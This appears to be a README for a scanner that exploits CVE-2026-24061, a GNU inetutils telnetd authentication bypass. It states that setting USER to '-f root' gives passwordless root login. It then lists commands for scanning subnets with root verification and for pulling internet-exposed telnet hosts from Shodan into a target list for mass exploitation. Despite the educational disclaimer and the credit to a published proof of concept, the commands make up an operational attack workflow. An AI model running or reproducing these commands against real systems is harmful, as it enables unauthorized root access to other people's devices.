⚠️ 非常重要的法律声明 ⚠️
本工具仅用于教育目的、安全研究、漏洞分析和授权测试。
USER=-f root(或变体)可无需密码立即以 root 身份登录。本扫描器得以实现,得益于 Hakai Security 团队发布的出色技术分析和概念验证。
他们详细的分析文章为利用向量、真实 payload 以及易受攻击的 telnetd 行为提供了精确的技术基础。
非常感谢 Hakai Security 的透明度、技术质量以及对安全社区的贡献。你们帮助使该工具对负责任的研究更加精确和有用。
--users 自定义用户列表(默认包含 root、admin、pi、ubuntu、debian 等)id 和 whoami 进行真实 root 验证(--verify)-w 调整)# 推荐:使用 virtualenv
python3 -m venv venv-cve
source venv-cve/bin/activate
# 安装依赖
pip install telnetlib3 colorama
python3 scan-cve-2026-24061.py 192.168.1.0/24 --verify --banner -w 50
# 使用目标列表(例如:Shodan)
python3 scan-cve-2026-24061.py alvos.txt -w 80 -t 6 --users root admin -o resultados.json
# 专注于 root(更快)
python3 scan-cve-2026-24061.py 10.0.0.0/24 --users root --verify --banner -t 5
# 试运行(仅列出 IP)
python3 scan-cve-2026-24061.py 206.42.41.0/24 --dry-run
pip install shodan
# 使用您的 API 密钥初始化
shodan init SUA_API_KEY_AQUI
# 下载可能的目标
shodan download --limit 500 iot-gnu-telnet.json.gz 'port:23 ("GNU inetutils" OR "telnetd (GNU inetutils)") -ssh'
# 提取 IP
shodan parse --fields ip_str iot-gnu-telnet.json.gz > alvos.txt
# 扫描
python3 scan-cve-2026-24061.py alvos.txt --verify --banner
欢迎提交 Pull Request,前提是保持道德焦点并强化责任声明。 许可证 MIT 许可证 – 但再次强调:未经授权的使用由用户自行承担全部责任。 为学习、提高意识和安全研究而制作。
⭐ 如果您觉得有用,请给个星标!
🛡️ 请极其负责任地使用。
Made with ❤️ by killsystema